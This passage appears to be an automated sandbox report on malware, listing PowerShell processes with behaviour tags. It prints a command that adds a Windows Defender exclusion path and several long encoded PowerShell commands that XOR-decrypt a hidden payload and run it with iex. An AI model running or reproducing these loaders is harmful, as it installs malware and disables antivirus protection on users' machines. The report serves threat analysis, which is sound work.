AHQAIAAkAHUAZgBkAGQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAdQBmAGQAZABbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHEAbwBrAGwAZABwAFsAJABpACUAJABxAG8AawBsAGQAcAAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABtAGsAaQBrAGIAcwBhAHIAKQApAHwAaQBlAHgA7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Packages'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JABoAHAAcgBmAGQAZAB5AGoAPQAnAGYAUgBFAGQAUgBTADUAMQBEADAAYwBTAGYAbAA4AEUAZgBoADEAdgBTAFIAZwBjAEMAMABZAFQAQwBtAEYAYwBWAFEAcABxAGUAaABWADYAQwAwAEkAVABWAEYAOABBAFUAZwBwAHEAZgB5AHgAQQBLAFEAWQBwAEMAMQA5AEgAYgBnADQAbwBXAHgAawBmAEsAUQBZAHEAZgBnAG8ARABWAEcAawB6AFIAUgBWADYAYwBFAE0AUgBZAFcARQBGAGIAdwAwAHcARwBCADAAZgBFADAATQBoAEMAbQBWAEoAVgBEAFEASgBXAHkAdAB1AEkAZwBNADgAVQBnAFoAWQBWAFEANABLAEcAUQBCAFUARgB3AE0AVABjAFUATgBCAGYAaAAxAHYAUwBSADAAZgBFADAATQA4AGIAMwAxAGEAVgBoADQASgBSAFMAdAA2AFAAUgA4AHEAZgAyAEYAWQBWAEcAcwBzAFMAUwBsAHUAQgB5AGMAcQBiAGsAdABjAGIAbQBvAE8AVwBoAHMAZgBEAHcASQBxAGIAbgAwAEEAZgBoAHAAdQBhAEMAcABsAEIAeABzAFMAVgBHAEYAaABWAEQAUgBtAFcAUgBWADEARAAwAE0AVgBhAG4ARgBsAGIAZwBFAFIAWABCAHAAcQBBADAATQBSAGUAbgBKAEUAWQBRADUAcQBYAGkAeAAxAEUAeAA4AC8AUQAwAEIAYgBVAHgANAB6AFEAaQA1AFUAQgBFAG8ANQBmAEEAWgBjAFUAeQBCAHUAZgBoAFoAQQBOAFIAOABwAEMAbQBKAFgAWQBtAG8AegBWAEMAdABxAEUAdwBjADgAVgBYAGwAWQBWAFQAUQBOAFcAQwAxADUATgBrAFEANgBmAGsATgBFAFYAQgA0AEcAUwBSADkAKwBCAEIAZwBTAFYAMgBWAEQAVgBSADAAcwBHAFEAVgBxAEwAUgA0AHEAVgAwAE4ARQBVAHkAQQBlAEYAdwBaAHUARgB3AFkAVQBiAGsAdABEAGUAQwBNAHMAUgBTAHgAcQBGAHcAbwBWAGYAbgBsAEoAZgBoADEAdgBTAFEAVgBxAGMARQBJAFMAZgBrAFEASABlAEcAbwA3AFEAUwA1ADYAUABSADgANQBlAGwAUgBiAFYAZwBFAGQARwBDADUARQBjAEQAYwBTAEMAbQBWAEYAVQB4AG8AZQBXAGgAVQBlAEYAQgBRADkAZQBuAEoARQBiAGcANQBxAFIAUQBaAHUAZABBAFkAUwBDAG0ASgBYAGYAUgA0AHYAVwBpAHgAcQBIAEEATQA1AGMAVQBBAEgAZgBSADQAMwBRAHgAVgBEAE4AUQBjAFUAUQBIAEkASgBmAGgAbwBOAFgAaQB4AGwATgBRAEkAbgBRAEcARQBBAFYAZwA0AEoAWABBAE4ARwBjAEIAOABWAGMAVwBKAGYAZQBoAG8AbwBTAFEAVgBxAEsAUQBRAFYAVgBGAHgARgBaAG0AdABtAEgAeQAxAEQARgBBAE0AbwBiAFUAQQBIAGYAUgBFADcAUgBTAHAANgBLAFEAbwBwAEMAbAB0AGIAZgBoADEAdgBTAFIAMABmAEUAMABNADgAYgAzADEAYQBWAGgANABKAFIAUwB0ADYAUABSADgAcQBmADIARgBZAFYARwBzAHMAUwBRAE4ANwBGAHgAcwBUAEMAMABkAGgAYgBnAEUATgBRAFEAWgB1AEYAeAB3AHEAVgBHAGsARwBWAFEARQA4AEcAUQBBAGYASwBSADQANQBlAGwAUgBiAFUAMgBzAE4ARwB5ADUAMQBEAHgAawBWAGYAbQBKAEYAWgBtAHQAbQBIAHkAMQBEAEYAQgBRADgAYgBsAGMAQQBmAGgAMABlAFgAZwBaAGwATgBrAFEANgBmAGsATgBFAFYAQgA0AEcAUwBSADkAKwBCAEIAZwBVAEMAMgBFAEYAVgBnAEUAVgBSAEMAcABxAEYAeABFADYAYwBXAEYAQQBiAFEANABzAFcAeAB0AEEARQAwAGMAVQBlAGwAUgBIAGUAeABvAGUAUgBTAHMAZgBGADAAWQBSAFkAWABsAGEAVQBoADQATwBXAHgANABmAGYARQBJAFMAVgAyAEoAQQBiAHcAMABzAEcAUQBWAGwAQgB4AGcAVABWADEAdABaAFYARABBAGUARgB3AFoAcQBLAFIANAA1AGUAbABSAGIAVgBqAFIAdQBXAFIAVgBFAGMARABZAHEAWQBYADEAYQBWAEQAUQB6AFcAUwB0AHEASwBRAFUAUwBVAEYAaABYAFUAaQBBAGUAUgBTADUAQQBkAEEAUQBxAFUAQQBaADEAYgBRAEUAUgBSAEMAeABBAEsAUQBRAFUAZgBsADkARwBWAFQAQQBkAEYAdwBaAHEARQB3AEEAVABDADIAWgBYAFUAaQBBAGUAUQBIAHQAYwBCAGoASQA2AFEASABFAEoAZQBDAE0AcgBGAHcAWgBxAEUAdwBBAFQAQwAyAFoAWABVAGkATQBzAFIAUwA1ADEAQgAwAFUAUgBVAEgASQBKAGYAaABvAE4AWABpAHgAbABOAFEASQA1AGMAVQBSAFgAWQBXAHMAMwBRAGkAeABBAEUAQQBjAGsAQwAzAGwAQgBiAFEANABSAEgAZwBaAGwATgBoAFEANgBmAHcAdABYAGUAdwA1AHEAUQBnAFoAdQBGAHgAdwBxAFYARwBrAEcAVgBRAEUAOABTAFMAbAA1AE4AawBRAFcAYgBVAGMASgBlAEcAcwB6AFEAdwBaAHUASQBoAGcAUgBWAEEASgBIAGIAVABBADAAUwBTAHAAWABOAGgAZwBTAGIAawBkAEgAVgBUAGMASgBSAEMANABmAEwAaABRAGcAYQBuAEYALwBiAFEARQA4AFcAaABvAGYAQwB4AHcAcQBiAG0ARQBCAFYAUgA0AEoAUgBSAGwAcQBBAHcAawBSAEMAWABWAGEAVQB4ADQAegBXAEMAMQBFAEIAQQBjAGkAWQBWAHQAYwBiAG0AbwBKAEgAaABWACsAQgBCADAAaABRADAATgBUAFkAUQBFAFIAUQBpAHgARABDAHgAQQBoAGIAbQBGAEUAVgBnADUAcQBUAFIANQAxAEIAdwBRAGkAZgBuAFUAQQBiAGcAOABuAFkAeQAwAGYAQwB4AHMAUwBmADAAdABoAGIAZwA0AFIAWABCAFoANgBJAFIAOABUAEMARQB0ACsAVgBnADQAUgBWAHkAMABlAEMAdwBVAHEAVgAyAEoARgBZAEEANQBtAEgAeQB4AEIAQgB4AHcAUwBDAHcAWgBjAGIAeQBNAFIASABSAFYANgBNAFUAWQBwAFUAMwBaAEgAZQBCADQAVgBSAHkAcwBmAEUAeABBAFMAQwBuAEUAQQBiAHgAOAB6AFcAQwB0ADEARAB5AEkAUgBmAGcAcABGAGIAUQBwAHEAUQBpAHAAcQBFAEIAMAAvAFEAMABCAGIAVQBnADQAVgBHAHkANQA2AEsAUQBvAHEAYQBuAEkASgBmAGgAbwAzAFoAaABWADEARgBBAGMAaQBmAG4AVQBBAGIAUQBvADAAVwB4ADUANgBGAHgAZwBpAGYAbgBVAEYAVgBDAEEANABWAGcAUgArAGMARABZAHAAWQBXAEYAYwBlAHoASQBaAFIAUgBWAG8ATABRAFUAVQBZAFgAbABLAGYAQgAwAGEASABRAFIAKwBjAEQARQBxAGYAbQBGACsAVgBnADUAcQBIAHkAdABxAEUAdwBrADcAZgBYADUASwBmAEEAMABzAEcAUQBWAGwATgBRAGMAUgBWAEcAcABYAFoAdwBvAGQAWQBSAFYAMQBKAGcAYwBsAEMAMwAxAGYAYgBRADQATgBIAHkAMQBxAEUAeABnAG0AZgBuAFYASwBWAG0AZwBOAFYAeQA1ADYASQBSADAAcQBZAFgAcABYAGUAdwB3AE4AUgBpADUANgBQAFUAWQA1AGUAZwBKAHkAVQB4AG8AZQBSAFMAcAA2AEQAMABZAFIAYgBsADkASgBiAFEAMABzAEcAUQBWAHEARAB3AFUAcQBmAG0ARgBEAGIAaQBBAGUARgB3AFoAbwBjAEIAOABVAFEAQQBKAGsAYgBtAHMAMwBRAGgAVgBsAEUAdwBBAHEAYgBtAEYAbABiAGcARQBSAFgAQgBwAGwARAB3AE0AUwBWAEgAMQBBAFYAQgA0AFoAWABRAFoAdQBkAEMAVQBUAEMAMgBWAEoAWgBBADQATwBTAFEAVgBsAEIAeABnAFIAWQBYAGsARQBWAFIANAB6AEcAZwBaAHUAZABEADQAUwBDADEAZABHAFYAVABVAE4ARwB5AHgAcQBFAEIAUQBqAGIAZwBZAEEAYgBRAEUAVgBSAGgAWQBlAEYAdwBNAFUAVgBHAFoAWABlAHcAOABWAEgAeQAxAEcAUABSADgAVQBWAEcAVgBEAGYAaAB3ADMAWABoAFUAZgBMAFIAOABUAEMAbQBJAEgAZQBDAEEATgBYAHkAeAA2AGMARQBBAFYAVQBIAEkASgBmAGgAeABxAFEAaQB0AFUAZABDAGMAcABDADEAdABjAGIAUgBFAEoAWABSAFYANgBGAHkAWQBwAFkAWAAxAEMAWQBtAHMASgBIAGkAdABxAEsAUQBZAHEAQwBuADEAawBiAFEARQBPAFMAUQBOADQAQQB3AEEAUwBmAGcAbwBEAFkAbQBvAE4AUgBpAHgARABGAHoAawBxAFUAZwBwAEYAWgBqAFEAWgBIAGkAdABxAEUAdwBvAFIAYgBtAFYASwBmAGgAcAB1AGEAeQAwAGYAYwBFAE0AbABDAG0ARgBHAFYAQgB3AHoAUQB4ADAAZgBmAEEATQBTAFYARgBkAGcAVgBUAEkAVgBSAGkAdABsAEYAeAA4AFQAVgBGADkAYwBWAEMAQQBlAFcAaABvAGUARgB4AHMAVABWADIARgBvAFYAaAA0AEoAVwB4ADUAMQBIAHgAcwBSAGIAawB0AFkAYgBqAFEAbgBRAGcAWgB1AGQARABvAFIAYgBtAEYAYgBiAFEANQByAEcAUQBCAFUARgB3AEkAVABiAGcAWQBEAFUAagBCAHEAYQBDAHAAcQBFAHgAawBVAFkAVwBGAEEAVgBXAHQAcQBlAHkANQA2AGQAQgA4AGsAZgBsADkARQBWAGcARQBPAFMAUgA5ACsAQgBCADAAbABmADIASgBIAFkAaQBBADgARwBRAEIAVQBGAHcASQBUAGIAZwBZAEQAVQBqAEIAcQBiAEMAMQBxAFAAUQBVAFUAQwBWAHQAWQBWAEQAUQBOAGUAeABWADEARAB3AGMAUgBiAGcAWgBZAFUAeAA0AEsAUwBSADkAKwBCAEIAZwBxAFYASABWAEQAVgBHAHMASwBHAFEAQgBVAEYAdwBJAFQAYgBnAFkARABVAGoAQgBxAGYAUgBWADEAQwAwAE0AcABZAFgAawBBAFoAQQA1AHEASABoAFYAMQBEADAARQBwAGIAawBSAFgAWgB3AG8AZQBRAEIAcAByAEYAQQBrADkAZgBBAE4AZQBlAEMATQBzAFIAUwA1AEQAQQB3AFkAVQBDAGwAeABGAFkAagBRAEoAVgBDAHQAcQBBAHcAbwBVAGYASAAxAEcAVQB3ADUAcQBIAGcAWgBwAGQAUgBRACsAZgBWAFEASABlAEMAQQBOAFgAeQB4ADYAYwBFAEEAVgBVAEEAWgBrAFUAeAA0AFoAVgB5AHQAcgBJAFIAdwBxAGIAZwBaAHkAVQB6AFEAWgBYAGkAMQBxAEEAeABvAFMAZgBtAFoAWABaAHcAbwBlAFIAUwB0AGwARAAwAEkAcQBiAFUAQQBIAGYAUgA0AHYAVgBpADEARABJAFUAVQA4AFYAVgBkAFkAVgBtAHMASgBlAHkAMABjAEQAMABJAFMAVQBIAEkASgBmAGgAbwBOAEgAaQB4AEQARQB4ADgALwBRADAAQgBiAFYAagBjAFoAVwB5AHMAZQBLAGcAWQBoAGIAawB0AEQAVgBXAG8ANwBhAHgAVgA2AGQAQgBzAFMAVgBHAEYAawBVAHgANABaAFYAeQB0AHUAQgBFAG8ANQBlAG0ARgBkAGIAZwA0AG4AVgBCAFYANQBOAGsAUQA2AGMAVQBOAEIAVgBnAEUAegBIAFEAWgBwAGQAUgBRADUAVQBHAEoAZgBmAFIANAB2AFcAaQB4AHEASABBAFkAbQBmAG4AVgBLAFYAbQBsAHEAUgBpADEANgBFAEEATgBFAFMASABCAHgAZgBqAE0AcwBHAFIAcABBAEUAeAAwAFIAWQBYADAAQQBiAFEARQBXAFcAaABvAGYAQwB4AHcAcQBiAG0ARQBCAFYAUgA0AEoAUgBSAGwAcQBBAHcAawBSAFEASABKAEUAWgBnADQAUgBIAGkANQA2AGYAQQBZADUAZQBtAEYARQBWAG0AbwBkAFcAeQB0ADYAQwB3AEUAUgBhAG4ASgBFAFkAUgBFAFYAWABoAFUAZgBJAFIAOABUAFUASABKAGIAVQBqAFIAdQBYAHgAVgBFAEIAQQBjAGwAYwBYAGwAQQBWAFQAUQBSAFgAaQB4AHEAQQB3AEEANQBlAG0ARgBaAFYAVwBzAE4AUgBTADEAcQBDAEIAUQA4AGIAMwAxAGMAVQB4AEUATgBYAGkAMQBBAEkAUQBrADUAZQBtAEYAQgBWAEEANQBxAEgAUwBwAEUAQgBBAGMAbQBmAG4AVgBLAFYAbQBsAHEAUgBpADEANgBFAEIAUQA2AGMAVQBOAEIAVgBnAEUAegBIAFEAWgB1AGQAQwBZAHAAWQBYADEAQwBZAGgANABaAEgAaQA1AHUAQgBCAGcAUgBmAG0AbABkAFUAagBSAHUASABRAFoAdQBkAEQAWQBxAFkAWAAxAGEAVgBEAFEAegBXAFMAdABxAEsAUQBVAFMAVQBIAEoAYgBWAEIANABOAFYAeQBwAHEARAB3AG8ANQBlAGcASgAzAFYAVwBvAFYAUgBCAFYANQBOAGsAUQBXAGEAQQA0AE4AJwA7ACQAbAB3AG0AbABxAGYAPQAnADcAWQBfAC4ATwAtAEUAcwBwADkAMwAwACcAOwAkAHUAYQBlAG0APQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABwAHIAZgBkAGQAeQBqACkAOwAkAGsAZABvAHgAZwA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB1AGEAZQBtAC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAHUAYQBlAG0AWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABsAHcAbQBsAHEAZgBbACQAaQAlACQAbAB3AG0AbABxAGYALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBkAG8AeABnACkAKQB8AGkAZQB4AA==7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JABiAHUAdwBsAHEAcwBqAGQAPQAnAE8AdwA4AFkAVgB3AHMARABiAEQAZwBoAEkAVgBZAHkASgBuAFkAKwBVAGcAdABuAEIAeQBZAEsATgBsAE0AQgBLAHgAQQArAFYAZwBzADUATwBYAG8ATgBOAGwATQBFAEUAaQBvAGMARQBqAEYAbQBPAFQAMAB4AE0AaABFAGcASgAzAFUAYwBFAGoASQBUAGIASABrAEwAVgBRAG8AKwBLAHgAQgBGAFYAdwBrAE0AQgAzADgAdwBNAFEAbABqAEkAMwBVAG0AVgB6AGwAbgBBAHoATQBMAEMARABBAGcARgBRAFEAWABGAHkAUQAvAFkAQwBJAEsATQBqAE4AaQBQAGoANABpAFYAZwBzADUAWQBIAGcATgBQAFQAUQBtAE8AQQBOAEEAQQBEAHAAbQBBADMAbwBrAE0AeQBnAC8ARQBBAEEAbQBEAEEAdwBEAEwAUwBZAHkASQB6AFEAOQBFAG4AVQBEAEEAQQA0AFgARgB4ADQAeQBNAGgANAA1AEsASABRAGgARQB6AHgAbQBIAHoAcwB5AE0AaQBoAGwATwBBAFIAQgBJAFEAMABjAEYAeQBJAEsAQwBEAFEARQBFAGkAcABKAEUARABJAE0ASAAzAG8ATgBOAGkAUQBBAEsAQgA4ACsARgBUADAAVABFADMAbwBKAEoAaQBjAGgASgB4AEIARgBGAHcAcwBNAEEAeQBZAG4ASAB4AFUAKwBLAEgAVQBFAFYAdwB3ADYATgBpADAANABOAGkAUQBhAEsAeAA4AFQARQB6AHgAbQBIAHoAcwB5AE0AaQBoAGwATwBBAEUAKwBVAGcAdABuAEIAeQBZAEsATgBsAE0ARwBLAEIAQgBGAEQAQQBwAG0AWgBYADAAbgBIAEQAUQA3AEUAaQBvADYAQwBRAGwAbgBQAFMAQQBoAEkAVgBZAHkATwB3AEIARgBWAGcAbwBUAEkAbgAwAG4ASABEAFEAOABFAGgAQQBjAEQAaQBFAFEAWgBTADAAaQBJAGwATgBrAEUAdwBBAEgAVQBDAGMAdABCAHoAdwBKAFYAaABZADUASwAzAFUAMgBGAFMARQBRAFoAUwAwAGkASQBsAE4AawBFAHcAQQBIAFUAQwBkAG4ATQBTAFUASgBNAGgANAA1AE8AQQBRAFgARABBAHcATQBIAHoAOABNAEMAdwBwAGwARQB3AFIARgBJAHcAcABuAEEAegA4AE0ASgBpAGMAaABLADMAUQBoAEEAQwBVAFgARgBEADQAeABNAGwATQArAE8AQQBSAEIARQBnAHAAbgBCAEMAMABpAEkAZwBJAHMASwBDAG8AVQBGAFEAMABUAEcARABvAGgATABSAFYAaQBPAHcAQQA2AEgAdwBrAEQASABDADAANABOAGkAYwArAEYAUgA4ADYARQBnAHcANgBPAFgAbwBLAEkAeABVACsASwBIAFUARQBWAHcAdwA2AE4AagA4ADgAQwBEAEIAaABGAFEAUQBYAEUAQwBRAFgARgBDAEUATQBQAFMAdwBnAEYAUwBrAGMAVgB3AG8AWABZAEEANABLAFYAagBBAGcARgBRAFEAYwBBAHkAYwB1AEoAaQBFAEwATABUAFEANgBLAHgAOAA1AEEARABnAEgARgB3AEkAeQBQAFQAYwBoAEoASABVACsAQwBEAEkARABCADMAcwBLAEkAagBBACsASgB3AEEAMgBIAFEAawB0AEYARAA0ACsASQBpAEEAdgBFAEgAWQB5AEQAdwB3AFQATQBpADAAaQBJAGkAdwB0AEUAQgBBADUAVQBDAGQAbQBPAFMAYwBoAEoAZwBFACsARQBnADgAaQBDAEQASQBNAEgARAA4ADUAVgAxADkAawBFAHkAawBoAEEAQwBRAEQATQBYAG8AaABJAFMAYwBsAE8AQQA4AEQAVQBDAEkAVABNAFQATQB4AEMAQQBJAG4ARgBBAEEAOQBBAEQAZwBIAEYAQwBFAEwATABUAFEANgBLAHgAOAA2AEIAUwBJAFQARwB6AGcATQBMAFQAeABtAFAAUwB4AEYAQwB3ADAAYwBCAEMAVQBsAEoAaABFAHkATwB3ADgAeQBWAHcAawBUAEEAegBNAGsARABpAGcAagBGAFIAQgBGAFYAeQBNAEMAWgBYADAAbgBIAEQAUQBqAEUASABRAEEAQwB6AEoAbQBFAHoAZwBoAEkAVgBZAHkARQBCAEEAcABBAEMATQBYAEIAeQBRAEwAQwBDAHcANwBFAEgAUQBZAEQAUwBRAC8AQgB5AFkATABWAHkAZwBzAEUAQgA4AHkAVgB3AGsARABiAEQAOABqAE4AaQBSAGkATwBBAFEAaQBDAFEAcwA1AEgAeQBRAEoAVgBnADQALwBQAFMAdwBpAEMAdwB0AG0ARwB6AE0ASgBQAFMAUgBsAEUAQgBCAEoARQBpAEUAYwBaAFMAMAB5AE0AaAA0AHYASwB4AFEAeQBVAEMARQBYAE0AeQBNAEgATABDAGMANwBPAEEAOQBBAFUAQQA0AEgARgB5AFkASwBMAFMAZwA1AE8AQQA4AEQAVQBDAEkAYwBBAHoATQBLAEMAegB4AGcARgBRAEEASABBAEQAZwBIAEYAQwBFAE0AUABTAHcAZwBGAFMAawBjAFYAdwBvAFgARgAzAEkAaABJAHcASQA2AEsAeAA4ADYAQwB5AFEAQgBiAEMATQBKAEMARABBAC8ARgBRAFEAeQBVAEMARQBYAEIAeQB3AGgASgBsAGMAZwBLAHgAUQB4AEQARABFADYARQB6AG8AeABEAEMAUgBzAFAAbgBSAEEAVQBBADQAQQBJAFQAbwB5AEQAQwBjADYATwB3AEEAVQBIAGoARQA1AE0AVABnAE4ASQBpAHMAbABPAEEAOABEAFUAQwBJAFQAUABUAEEATABDAEEAMAB5AEkAUgBRAHkASwBEAEkATQBOAGoANAA5AFYAeQBnADYASwB4AEEAaQBWAGcAbwBUAEEAeQBFACsASQBpAEEAdgBFAEgAYwAyAEQAUQB3AFQATwBUAHcASwBEAEMAYwBoAEkAeAA4AFkAQwB6AEYAbgBBADMAbwB5AE4AaQBjADcASQBEADAAQQBCAEQANABNAEcAeQBZAEwAQwB5AGcAMgBJAEIAQQBpAEUAdwBrAEQAWQBDAGsANQBQAFMAUQBpAEkAdwBBADIAVgB6AEUAQwBMAFEAYwBLAFYAeQBnADkARQB3AEUASQBOAGoARQBEAEcAegBnAHgATQBnAEkANQBFAG4AWQBJAEsAUQBrAEQARwB6AE0ASwBWAGkAZwBqAEsAeQBrAGgARQBqADgAVABIAHoAdwBOAEkAeQBnAGkASwB4AEEAbQBEAFEAawBTAEIAegB3ACsASQBqAEIAaABGAFEASgBKAFYAVABJAE0ASAB6AGsAeABQAFEAbwB6AFAAaAA4AFUAQwB3AGwAbgBPAFMATQBsAFYAeQBOAGgASwBDAG8ANgBWAEQASQBDAEwAUwBFAHgAUABUAFEAMgBKAGcAQQA2AEUAUQAwAFMARwB6ADAAeQBNAGoAQQAvAEUAQQBFAGkARQBUADQAVABBADMANABNAEkARgA5AG4ASwB4ADgANgBGAEQARQBNAFAAagA4AHkAUABRADQANQBPAHoAMABEAFUAQwBJAGMARgB5AFkASwBDAEEASQBzAE8AQQBOAEEAQQBEAHcANQBBADMAawBrAE0AeQBnAC8ARQBBAEEAbQBEAEEAdwBEAEwAUwBZAHkASQB6AFEAOQBFAG4AVQBFAE0AZwBzADUATwBTAFEAeQBWAHoAQQBzAE8AQQBSAEIASgBRAHcAUgBMAFQAdwB5AFYAMQA4AGcAUABqADAARABEAEEAcwBUAEEAegA4AHkAVgBpADgAZwBJAHcAQQBtAEYARABFAE0AUABpADAANABOAGkAYwA3AEoAQQBFAGgASABTAFUAUwBHAEMAUQBuAEgAeABVACsARgBRAEEANgBFAHcAcwA1AE8AVAAwAEwATgBpAGQAcwBPAEEASgBGAEMAdwB3AHQAWgBCADQAeABWAHcANAA1AEsAdwA4AG0ARgBEAEkARABCAHgAOAB4AFAAUwBnAG4ASgB3ADgANgBGAHoASgBtAE0AUwBZAEwARABDAGMAaABJAEIAOABpAE0AdwB3AFQARQB6AE0ATQBMAFQAQQBpAFAAagAwAEQARABBAHcAVABIAHoANABMAEMAQQBvAGkARQBoAFIARgBJAGoASQBEAEwAUwBJAE4ATgBpAGQAcwBPAEEAUQBVAE4AagA0AFEARQB3AFEAaQBIAHgAVgBpAE8AdwA4AFUARgBEAEkATQBHAEMAMAA0AE4AaQBRAGEASwB4ADgAVABFAHoAMQBtAEcAeQBVAHkATQBqAFIAawBFAHcAQQBtAEQARAA0AFQARQB6AEEASgBWAEMAUQBzAEUAQgBCAEYARABRAGsATQBGAHkASQBLAEoAaQBjAGgASgB4ADgAKwBDAHcAcwAvAE8AUwBFAGgASgBqAFIAaABGAFEAOAAyAEUAUQBrAHQARgBEADQAOABJAGwAOAA3AEUAMwBWAEYATQBnADAATQBGAHkAWQBoAEkAQQBvAGcARgBRAEEAbQBIAGoARQBEAEcAMwBvAEoAUABUAHcANQBPAEEAUgBCAE4AQQB3AEQAWQBBAGMAeQBQAFQAdwA1AEUAdwBRAHkATABnAGsARABNAFMAVQB5AFAAUwBoAGwAUABqADAARABEAEEAcwA2AFAAWABzAEsATQBqAHcAOABPAEEATgBBAEEARAB3ADUAQQAzAGsAawBNAHkAZwAvAEUAQQBBAG0ARABBAHcARABMAFMAWQB5AEkAegBRADkARQBuAFUARQBNAHoASQBNAEIAMwBvAEoATQBsAE0ANwBFAG4AWQArAEMAdwB3AFgARgBEADQANQBNAGgANABtAEUAMwBRAFUATQB3AHcAVABFAHoATQBNAEkAQQBvADQASgBYAFYARgBKAEQARQBNAEIAMwBvAHkAUABTAHcAbABLAHgAOAA5AEEAQwBRAEIAQgB6AHcASwBDAHoAUQBCAEYAUQBCAEoARQBEAHMARABEAHcASQBLAFYAdwBvAGcASwAzAGQASgBFAGoAawA1AEUAMwBvAE0ASQBqAEEAcwBFAEIAQQBtAEgAUwBFAFgAWgBCADQATQBJAGkAQQBzAEYAUQBFAFUAQwBEAEkARABZAEEAZwBNAEMAQwBBAGwARQB3AEEAMgBEAGcAbwBUAEEAQwAwAGsATQBBADQAbABLAHcAQQBpAEMAdwBvACsASgBuADAAaQBMAFMAeABoAEYAUgBCAEIAQwBqAEUAOQBZAEEAdwBOAEkAagBBAC8ARgBSADgAaQBGAHcAcABtAFkAQgA4AEoATQBsAGMANQBKAFEAQQBjAEUAdwBrAE0AQgBDADAANABOAGkAYwA3AEoAQQBFAGgARQBEADAAdABOAG4AMABuAEgARABRAHMARgBBADgAbQBFAHoASQA1AEgARAA4ADUATQBoADQAbQBFADMAUQBVAEwAagBFAE0ASAB5AEUAKwBJAGoAQQBzAEUAeABBAGMARQBqAEUATQBCAHkAWQBoAEkAVgBZAHkATwB3AEEAcQBEAHcAbwBjAEcAeQBZAG4ASAB4AFUAKwBFAGkAawBZAFYAZwBvAEQARAB5AE0AawBDAFMAdwA1AEUAbgBRAGkARAB3AHMANgBCAHcAQQBLAEMAegBRADUARQBpAGsAcQBEAHcAbwBYAEYASABNAGgASgBnAEkARQBKAHcATQAxAFYAagB3AEgATgBuADAAbgBIAEQAUQBzAEYAQQA4AG0ARQB6AEkANQBIAEQAOAA5AEMARABBAHYARgBRAEEAMgBIAGcAdwBSAEcAegB3AE0ATQBsAE4AbABPAEEATgBBAEEAQwBVAEEARgBIADAAbgBIAEQAUQBzAEYAQQA4AG0ARQB6AEkANQBIAEQAOAA1AE0AaAA0AG0ARQAzAFEAVQBJAGoASQBEAFoAQwBJAEsAQwBEAFEAQgBGAFEAQQAyAEgAZwB3AFgARgBIAE0AaABKAGoAUQA0AEsAQgBBAEkASABUAEkAQQBKAG4AMABpAEwAUwB4AGgARgBSAEIAQgBDAGoARQA5AFkAQgA0AE0ASQBpAEEAcwBGAFEARQBVAEMARABJAEQAWQBBAGcATQBDAEMAQQBsAEUAdwBBADIARABnAG8AVABBAEMAMAA0AE4AaQBjACsARgBRADgANgBWAGoASQBBAEoAbgAwAGkATABTAHgAaABGAFIAQgBCAEMAagBFADkAWQBCAEkAeABNAGgASQA1AEoAdwBCAEoATgBBAHcARABZAFMAMAA0AE4AaQBjACsARgBRADgANgBWAGoASQBBAEoAbgAwAGkASQBoAFoAZwBLAEgAUQAyAEMAagBJADUAYgBTADAANABOAGkAYwA4AE8AdwBRAFgARABEAEoAbgBIAHkATQB5AFYAeABKAGgASwBEADUARgBNAGoARQBNAEcAegBnADgAQwBDAEEAaABLAHgAUQBlAEQAZwBjAGQARgBDAE0AbgBIAHgASgBsAEUAaQBrAGIAQQBBADAAdQBKAGkARQBNAFAAUwBoAGoASwBDADQAeABYAGkARQBTAEgAeQBZAHkAVgB3AG8AdgBGAFEAQQBtAEgAaQBRAEMARwB5AEEASgBJAGoAQQArAEYAUgBBAEkAQwB6AEkAUwBCAHkASQBMAFYAeABVAHkAUABSAEkAMgBEAFEAdwBUAE8AVAB3AEsARABDAGMAKwBFAEEAOAArAEgAZwBrAEgARgBEADQAKwBMAFMAdwBsAEsAMwBVAFUAQwB3AHMAOQBGAHcAcwBqAEoAagBRAGkASwB4AEIARgBDAFEAcwA5AEkAaQAwAGkATABUAFEAOABFAHgAOAA2AEYAdwBzAGMARQBEAG8AaABKAGwAYwBFAEUAaQBvAGMARQBqAEYAbQBPAFQAMAB4AE0AaABFAHkATwB3ADgAVQBGAEQASQBNAEcAQwAwAGsATQB5AGcANQBGAFEAOABpAEYAdwBvADUATQBUAEEAaABKAGoAUQBzAEYAQQA4AG0ARQB6AEkANQBIAEMAMABrAE0AegBRADkARQBuAFUARQBLAEQARQBEAFoAQwBZAGgASgBqAFEAawBGAEIAQQArAEgAegBJADUARAB6AHcAaABKAGwAYwBBAEsAQgA4ACsARgBUADAAVABFADMAbwBKAEoAaQBjACsASwBDAGsAMgBGAHoARQA5AEYARAA0ADYASQBqAEEAdgBLAEgA